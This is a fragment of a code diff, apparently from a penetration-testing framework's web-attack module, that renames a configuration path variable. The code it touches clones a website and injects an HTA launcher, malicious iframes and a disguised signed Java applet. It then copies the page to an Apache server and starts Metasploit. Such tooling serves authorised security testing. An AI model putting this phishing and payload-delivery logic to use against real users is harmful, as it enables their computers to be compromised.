fileopen = open(userconfigpath + "web_clone/index.html", "r")
|
||||
# Read add-on for java applet
|
||||
fileopen2 = open("src/webattack/web_clone/applet.database", "r")
|
||||
# Write to new file with java applet added
|
||||
filewrite = open(setdir + "/web_clone/index.html.new", "w")
|
||||
filewrite = open(userconfigpath + "web_clone/index.html.new", "w")
|
||||
fileopen3 = open("src/webattack/web_clone/repeater.database", "r")
|
||||
|
||||
# this is our cloned website
|
||||
|
@ -368,31 +368,31 @@ try:
|
|||
|
||||
# if we are using HTA attack
|
||||
if check_options("ATTACK_VECTOR") == "HTA":
|
||||
if os.path.isfile(setdir + "/Launcher.hta"):
|
||||
data1 = open(setdir + "/web_clone/index.html", "r").read()
|
||||
data2 = open(setdir + "/hta_index", "r").read()
|
||||
if os.path.isfile(userconfigpath + "Launcher.hta"):
|
||||
data1 = open(userconfigpath + "web_clone/index.html", "r").read()
|
||||
data2 = open(userconfigpath + "hta_index", "r").read()
|
||||
data3 = data1.replace("</body>", data2 + "</body>")
|
||||
filewrite = open(setdir + "/web_clone/index.html", "w")
|
||||
filewrite = open(userconfigpath + "web_clone/index.html", "w")
|
||||
filewrite.write(data3)
|
||||
filewrite.close()
|
||||
print_status("Copying over files to Apache server...")
|
||||
apache_dir = check_config("APACHE_DIRECTORY=")
|
||||
if os.path.isdir(apache_dir + "/html"):
|
||||
apache_dir = apache_dir + "/html"
|
||||
shutil.copyfile(setdir + "/web_clone/index.html",
|
||||
shutil.copyfile(userconfigpath + "web_clone/index.html",
|
||||
apache_dir + "/index.html")
|
||||
shutil.copyfile(setdir + "/Launcher.hta",
|
||||
shutil.copyfile(userconfigpath + "Launcher.hta",
|
||||
apache_dir + "/Launcher.hta")
|
||||
|
||||
print_status("Launching Metapsloit.. Please wait one.")
|
||||
subprocess.Popen("%smsfconsole -r %s/meta_config" %
|
||||
(meta_path(), setdir), shell=True).wait()
|
||||
(meta_path(), userconfigpath), shell=True).wait()
|
||||
|
||||
# selection of browser exploits
|
||||
# check to see if multiattack is in use
|
||||
multi_meta = "off"
|
||||
|
||||
if os.path.isfile(setdir + "/multi_meta"):
|
||||
if os.path.isfile(userconfigpath + "multi_meta"):
|
||||
multi_meta = "on"
|
||||
|
||||
if attack_vector == "browser" or multi_meta == "on":
|
||||
|
@ -400,19 +400,19 @@ try:
|
|||
bcolors.RED + "[*] Injecting iframes into cloned website for MSF Attack...." + bcolors.ENDC))
|
||||
# Read in newly created index.html
|
||||
if attack_vector == "multiattack":
|
||||
if os.path.isfile(setdir + "/web_clone/index.html"):
|
||||
os.remove(setdir + "/web_clone/index.html")
|
||||
if os.path.isfile(userconfigpath + "web_clone/index.html"):
|
||||
os.remove(userconfigpath + "web_clone/index.html")
|
||||
# check to see if the file is there first
|
||||
if not os.path.isfile(setdir + "/web_clone/index.html.new"):
|
||||
if os.path.isfile(setdir + "/web_clone/index.html.bak"):
|
||||
if not os.path.isfile(userconfigpath + "web_clone/index.html.new"):
|
||||
if os.path.isfile(userconfigpath + "web_clone/index.html.bak"):
|
||||
shutil.copyfile(
|
||||
setdir + "/web_clone/index.html.bak", setdir + "/web_clone/index.html.new")
|
||||
if os.path.isfile(setdir + "/web_clone/index.html.new"):
|
||||
userconfigpath + "web_clone/index.html.bak", userconfigpath + "web_clone/index.html.new")
|
||||
if os.path.isfile(userconfigpath + "web_clone/index.html.new"):
|
||||
shutil.copyfile(
|
||||
setdir + "/web_clone/index.html.new", setdir + "/web_clone/index.html")
|
||||
userconfigpath + "web_clone/index.html.new", userconfigpath + "web_clone/index.html")
|
||||
time.sleep(1)
|
||||
fileopen = open(setdir + "/web_clone/index.html", "r").readlines()
|
||||
filewrite = open(setdir + "/web_clone/index.html.new", "w")
|
||||
fileopen = open(userconfigpath + "web_clone/index.html", "r").readlines()
|
||||
filewrite = open(userconfigpath + "web_clone/index.html.new", "w")
|
||||
counter = 0
|
||||
for line in fileopen:
|
||||
counter = 0
|
||||
|
@ -449,13 +449,13 @@ try:
|
|||
bcolors.BLUE + "[*] Malicious iframe injection successful...crafting payload.\n" + bcolors.ENDC))
|
||||
|
||||
if attack_vector == "java" or attack_vector == "browser" or attack_vector == "multiattack":
|
||||
if not os.path.isfile(setdir + "/web_clone/%s" % (rand_gen_applet)):
|
||||
if not os.path.isfile(userconfigpath + "web_clone/%s" % (rand_gen_applet)):
|
||||
shutil.copyfile("src/html/Signed_Update.jar.orig",
|
||||
setdir + "/web_clone/%s" % (rand_gen_applet))
|
||||
userconfigpath + "web_clone/%s" % (rand_gen_applet))
|
||||
# move index.html to our main website
|
||||
if os.path.isfile(setdir + "/web_clone/index.html.new"):
|
||||
shutil.move(setdir + "/web_clone/index.html.new",
|
||||
setdir + "/web_clone/index.html")
|
||||
if os.path.isfile(userconfigpath + "web_clone/index.html.new"):
|
||||
shutil.move(userconfigpath + "web_clone/index.html.new",
|
||||
userconfigpath + "web_clone/index.html")
|
||||
|
||||
# catch keyboard control-c
|
||||
except KeyboardInterrupt:
|
||||
|
|
Loading…
Reference in a new issue